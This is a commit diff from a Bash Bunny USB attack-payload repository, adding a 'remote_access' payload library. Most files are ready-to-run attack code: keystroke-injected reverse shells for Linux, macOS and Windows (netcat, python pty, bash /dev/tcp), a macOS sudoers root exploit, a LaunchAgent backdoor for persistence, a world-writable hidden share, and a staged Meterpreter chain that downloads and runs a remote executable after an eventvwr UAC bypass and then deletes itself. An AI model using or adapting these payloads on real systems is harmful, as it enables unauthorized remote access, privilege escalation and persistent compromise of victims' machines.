hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Cleanup: Sort payloads by category

Browse Source
This commit is contained in:
Sebastian Kinne
2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions
Download Patch File Download Diff File Expand all files Collapse all files

31
payloads/library/remote_access/LinuxReverseShell/README.md Normal file
View File

@@ -0,0 +1,31 @@
# Linux Reverse Shell for Bash Bunny
Author: tuzzmaniandevil
Version: Version 1.0
## Description
With the help of ducky script, it opens a terminal window using `CTRL ALT T`. Once the window is open it will copy the script to a hidden directory in the home directory.
The script will then be executed which starts a background reverse shell, delete itself and closes the terminal window.
Great when combined with the LAN Turtle :-)
Example listening for the connection on linux:
`nc -nlvp 4444`
## Configuration
- **RHOST** The host computer to connect to
- **RPORT** The post to use for the connection
## Requirements
The RHOST pc must be accessible from the target machine
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Setup |
| Blue (blinking) | Executing Ducky and starting script |
| Green | Finished |

10
payloads/library/remote_access/LinuxReverseShell/a.sh Normal file
View File

@@ -0,0 +1,10 @@
#!/bin/bash
A="$0"
H=$1
P=$2
rm -rf ~/.a/
mkdir -p ~/.a/
mknod ~/.a/p p
/bin/sh -c /bin/sh 0<~/.a/p | nc $H $P 1>~/.a/p &
disown $!
rm -f "$A"

49
payloads/library/remote_access/LinuxReverseShell/payload.txt Normal file
View File

@@ -0,0 +1,49 @@
#!/bin/bash
#
# Title: Linux Reverse Shell
# Author: tuzzmaniandevil
# Version: 1.0
#
# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
#
# Red ...............Setup
# Blue Blinking......Executing
# Green..............Finished
# Config options
RHOST=127.0.0.1
RPORT=4444
# Start Setup
LED R
# Set Attack Mode
ATTACKMODE HID STORAGE
LANGUAGE='us'
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
# Wait for Storage to mount
sleep 5
# Open a terminal
Q CTRL-ALT t
# Wait for terminal to open
sleep 1
LED B 250
# Copy bash script
Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/"
Q STRING $SWITCH_POSITION
Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT"
Q ENTER
# Quit the terminal
LED R G 250
Q STRING exit
Q ENTER
LED G

49
payloads/library/remote_access/MacReverseShell/payload.txt Executable file
View File

@@ -0,0 +1,49 @@
LED B
#Set your Variables, bro
DYLD_ROOT=true
LHOST=192.168.17.12
LPORT=4444
LANGUAGE='us'
# Gimme a Keyboard please. Thanks.
ATTACKMODE HID VID_0X05AC PID_0X021E
LED R G B
# Get a terminal
QUACK DELAY 400
QUACK GUI SPACE
QUACK DELAY 300
QUACK STRING terminal
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 400
# optional DYLD exploit script
if $DYLD_ROOT; then
LED R
QUACK SPACE
QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s
QUACK ENTER
QUACK DELAY 200
QUACK ENTER
QUACK ENTER
QUACK ENTER
QUACK ENTER
QUACK DELAY 200
fi
# python reverse shell
QUACK SPACE
QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\)
QUACK ENTER
QUACK DELAY 200
QUACK SPACE
QUACK STRING clear
QUACK ENTER
QUACK GUI q
QUACK DELAY 100
QUACK ENTER
# Green is the official Light of "finished"
LED G

21
payloads/library/remote_access/MacReverseShell/readme.md Executable file
View File

@@ -0,0 +1,21 @@
# Mac Reverse Shell
Author: mrt0mat0
Version: Version 1.0
## Description
Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell.
## Configuration
This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Blue | Setup |
| White | Running the scripts |
| Red | r00t exploit is running (optional |
| Green | Finished |

9
payloads/library/remote_access/NothingLess/nl.cmd Normal file
View File

@@ -0,0 +1,9 @@
ECHO off
REM gather the system file structure
mkdir c:\Users\tempa
tree /a /f > c:\Users\tempa\tree.txt
REM creates a hidden share syntax(net share <sharename>=<sharelocation> /grant:<user>,<permission>)
net share nless$=C:\Users /grant:Everyone,full
REM creates security permissions for the shared folder syntax(icacls <sharedlocation> /grant <user>:<permissoons> /T
icacls "C:\Users" /grant Everyone:(OI)(CI)F /T

48
payloads/library/remote_access/NothingLess/payload.txt Normal file
View File

@@ -0,0 +1,48 @@
#!/bin/bash
#
# Title: Nothing Less
# Author: StinkyBliss
# Version: 1.0
# Target: Windows
#
#
# Maps the file system and stores it in c:\users\tempa
# Shares a location to everyone and grants full security permissions to everyone
#
# For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
# To share a drive change the path in nl.cmd to c: remove the quotes
LED R 200
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
ATTACKMODE HID
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell -Verb runAs
#Q STRING powershell
Q ENTER
# Bypass UAC
Q DELAY 1000
Q LEFT
Q ENTER
LED R G 200
ATTACKMODE HID STORAGE
# Start nl.cmd
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')"
Q ENTER
# Wait for nl.cmd and exit
Q DELAY 1000
Q STRING exit
Q ENTER
sync
LED G

23
payloads/library/remote_access/NothingLess/readme.md Normal file
View File

@@ -0,0 +1,23 @@
# NothingLess for Bash Bunnys
* Author: StinkyBliss
* Version: Version 1.0
* Target: Windows
## Description
For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
To share a drive change the path in nl.cmd to c: remove the quotes
## Configuration
None, only optionl changes
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red (blinking) | Setting up |
| yellow (blinking) | Attack running |
| Green | Attack Complete |
| ------------------ | -------------------------------------------- |

68
payloads/library/remote_access/RAZ_MacReverseShell/payload.txt Normal file
View File

@@ -0,0 +1,68 @@
#!/bin/bash
#
# Title: RAZ_MacReverseShell
# Author: RalphyZ
# Version: 1.1
# Target: Mac OSX
# Dependencies: None
#
# Description: Starts a terminal window on a Mac,then creates a bash reverse
# shell inside a script, /tmp/s.sh. It then adds the script to the
# Launch Agent - establishing persistence - running at a
# user-defined interval
#
# Colors:
# Green (blinking)..........Working
# White.....................Completed without error
# Edit this to point to the NetCat Listener
LISTENER_IP="192.168.1.100"
LISTENER_PORT="4444"
# How often (in minutes) should this run from the Launch Agent
FREQUENCY="60"
#----Proceed with Caution------------------------------------------------------
# Green blinking LED
LED G 100
# Human Interface Device
ATTACKMODE HID
# Emulate the Ducky - QUACK!
QUACK DEFAULT_DELAY 300
# Start the Mac Terminal
QUACK COMMAND SPACE
QUACK STRING terminal
QUACK DELAY 500
QUACK ENTER
# Give the terminal window a second to pop up
QUACK DELAY 1000
# Bash Reverse Shell into a script 's.sh'
QUACK STRING echo \"bash -i \>\& /dev/tcp/${LISTENER_IP}/${LISTENER_PORT} 0\>\&1\" \> /tmp/s.sh
QUACK ENTER
QUACK DELAY 500
# Change file permissions to allow execution
QUACK STRING chmod +x /tmp/s.sh
QUACK ENTER
QUACK DELAY 500
# Add to the Launch Agents
QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\\n \<dict\>\\n \<key\>Label\</key\>\\n \<string\>com.ralphyz.backdoor\</string\>\\n \<key\>ProgramArguments\</key\>\\n \<array\>\\n \<string\>/bin/sh\</string\>\\n \<string\>/tmp/s.sh\</string\>\\n \</array\>\\n \<key\>RunAtLoad\</key\>\\n \<true/\>\\n \<key\>StartInterval\</key\>\\n \<integer\>${FREQUENCY}\</integer\>\\n \<key\>AbandonProcessGroup\</key\>\\n \<true/\>\\n \</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
QUACK ENTER
QUACK DELAY 500
# Load the new Launch Agent - establishing persistence - and clear the terminal
QUACK STRING launchctl load com.ralphyz.backdoor.plist \&\& clear
QUACK ENTER
# Close the Terminal Window
QUACK COMMAND q
# White LED for finished
LED R G B

1
payloads/library/remote_access/RAZ_ReverseShell/listener_ip.txt Normal file
View File

@@ -0,0 +1 @@
192.168.1.100

1
payloads/library/remote_access/RAZ_ReverseShell/listener_port.txt Normal file
View File

@@ -0,0 +1 @@
4444

75
payloads/library/remote_access/RAZ_ReverseShell/payload.txt Normal file
View File

@@ -0,0 +1,75 @@
#!/bin/bash
#
# Title: RAZ_ReverseShell
# Author: RalphyZ
# Version: 1.0
# Target: Windows 7+
# Dependencies: The following files must exist in the switch folder:
# nc.exe - Windows binary for netcat with the -e flag
# listener_port.txt - The Port number for the netcat listener
# listener_ip.txt - The IP Address for the netcat listener
#
# Description: Executes a netcat reverse cmd shell at a given IP and Port
# Intentionally, this script leaves a trace in the Run Box
#
# Colors:
# Green.....................Working
# White.....................Completed without error
# White (blinking)..........Incrementing the port in listener_port.txt
# Blue (blinking)...........listener_port.txt was not found
# Light-Blue (blinking).....listener_ip.txt was not found
# Amber (blinking)..........nc.exe was not found
# Change this if you want to enable auto_increment of the netcat port
# If true, the port number is increased by 1 everytime the script runs
# This is good for Red Teams doing PenTesting on multiple computers
auto_increment=false
LED G
ATTACKMODE HID STORAGE
LANGUAGE='us'
# Get the switch position
source bunny_helpers.sh
# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
LED B 100
exit 1
else
my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
LED B G 100
exit 1
else
my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
LED R G 100
exit 1
fi
# Execute the powershell command in the run box with the appropriate variables
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
QUACK ENTER
# If auto_increment, then update the listener_port file
if [ "$auto_increment" = true ] ; then
LED R G B 100
echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
# Allow the write to sync to the USB
sleep 1
fi
# Signal everything went OK - white
LED R G B
exit 0

6
payloads/library/remote_access/SingleSecondShell/ducky_script.txt Normal file
View File

@@ -0,0 +1,6 @@
DELAY 2000
GUI r
DELAY 200
STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content
DELAY 100
ENTER

18
payloads/library/remote_access/SingleSecondShell/payload.txt Normal file
View File

@@ -0,0 +1,18 @@
LED G
ATTACKMODE HID STORAGE
# Set your language here
LANGUAGE='us'
LED R G
# Check for switch position to make it easier for us.
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
else
LED R
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi

39
payloads/library/remote_access/SingleSecondShell/readme.md Normal file
View File

@@ -0,0 +1,39 @@
# SingleSecondShell
Author: [@0xCoto](https://github.com/0xCoto)
Version: Version 1.0
## Description
Plug in the bash bunny, get a shell. Instantly.
The <1 Second ReverseShell Payload is going to run blazing fast on the Bash Bunny, and cannot work on any other BadUSB devices, such as the USB Rubber Ducky that quick. That is obviously the reason this Payload is dedicated and specifically developed for the Bash Bunny. Plug in, and before you know it, you've got a shell. How awesome is that?
## Configuration
#### Generating Payload
In order to generate your reverse_tcp Payload, you need to run the following command on your Kali machine (unless you have msfvenom installed on another OS): ```msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f psh-cmd smallest```
Make sure to replace `YOUR_IP` with your local/public IP Address (depending on the type of attack you are looking to perform) and `YOUR_PORT` with the port that you've forwarded (if you are performing a public attack, outside your network).
When the payload is generated, remove everything up to `powershell.exe` and upload it to pastebin. Here's my example: http://pastebin.com/raw/DJbS5mTj
#### Shortening the URL
As you can see, we have a pretty long URL. So, in order to shorten the URL and reduce the amount of keystrokes, therefore attacking time, we are going to be using a URL shortening service, such as https://goo.gl/.
#### Completeing the script
That's it. Now just replace the `$u='YOUR_LINK'` with your new URL. For example: `$u='goo.gl/8ggZD1'`
Note: You do not need to include `http(s)://` in your URL, so you can go ahead and get rid of that too to reduce keystrokes and speedup the keystroke injection.
## Listening to Connections
Listening to connections is pretty straightforward, but I'm not going to cover it in detail in this tutorial. All you need to do is use a listener software, CLI or GUI, such as `msfconsole` or `Armitage`, both of which can be setup to work with each other very easily.
## Bash Bunny Status
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Failed to open script file |
| Amber | Script Running |
| Green | Finished |

48
payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt Executable file
View File

@@ -0,0 +1,48 @@
#!/bin/bash
#
# @title: Bash bunny Windows staged meterpreter payload
# @author: Silvian Dragan
# @props: Darren Kitchen, Mubix
# @version: 1.0
# @target: Windows 7 8, 8.1 and 10.
#
#
# @details: This is an a advanced meterpreter staged payload injection using the
# rubber ducky capabilites of the bash bunny to call a powershell script referred
# to sc.txt which must be hosted on a remote server.
# This script then downloads the update.exe which is also hosted on
# a remote host, and then executes it on the target machine.
# note it will also attempt to clean up any registry footprint from the run command.
# Once the bash bunny is initialized the script should not take more than
# 2-3 sec to execute.
#
# @Dependencies: you must have sc.txt and update.exe hosted on a remote server.
# replace the 127.0.0.1 with your own host and also feel free to change the name
# of either sc.txt or update.exe to names of your choosing.
# You must also generate the appropariate update.exe payload using msfvenom for
# windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
# tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
#
# Colors:
# Amber: starts the attack payload
# Green: successful execution
# Red: failure to load dependency ducky script
#
ATTACKMODE HID
LED R G 200
LANGUAGE='us'
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
LED G
else
LED R
echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
exit 1
fi

32
payloads/library/remote_access/WindowsMeterpreterStaged/readme.md Normal file
View File

@@ -0,0 +1,32 @@
# Windows Meterpreter staged payload
* Author: Silvian
* Version: Version 1.0
* Target: Windows 7, 8, 8.1, 10
## Description
This is an a advanced meterpreter staged payload injection using the
rubber ducky capabilites of the bash bunny to call a powershell script referred
to sc.txt which must be hosted on a remote server.
This script then downloads the update.exe which is also hosted on
a remote host, and then executes it on the target machine.
Note it will also attempt to clean up any registry footprint from the run command.
Once the bash bunny is initialized the script should not take more than 2-3 sec to execute.
## Dependencies
you must have sc.txt and update.exe hosted on a remote server.
replace the 127.0.0.1 with your own host and also feel free to change the name
of either sc.txt or update.exe to names of your choosing.
You must also generate the appropariate update.exe payload using msfvenom for
windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Executin Payload |
| Green | Attack Finished |
| Red | Failed to load dependencies |

30
payloads/library/remote_access/WindowsMeterpreterStaged/sc.txt Normal file
View File

@@ -0,0 +1,30 @@
Sub Main()
'Download File
CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND http://127.0.0.1/update.exe %temp%/update.exe"),0,true
'Set new zoneId
CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\update.exe:ZONE.identifier"),0,true
'Write UAC bypass regkey
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\update.exe" ,"REG_SZ"
'Trigger UAC bypass
CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
'Reset regkey
GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
'Remove this script
CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
End Sub
'Dont wanna display shit
On Error Resume Next
Main
If Err.Number Then
'on error cleanup and exit
CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
WScript.Quit 4711
End If

7
payloads/library/remote_access/WindowsMeterpreterStaged/windows-staged-meterpreter.txt Executable file
View File

@@ -0,0 +1,7 @@
REM change 127.0.0.1 to the IP address or host name of your own host service
DELAY 1000
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/sc.txt', '%temp%/update.vbs'); %temp%/update.vbs
ENTER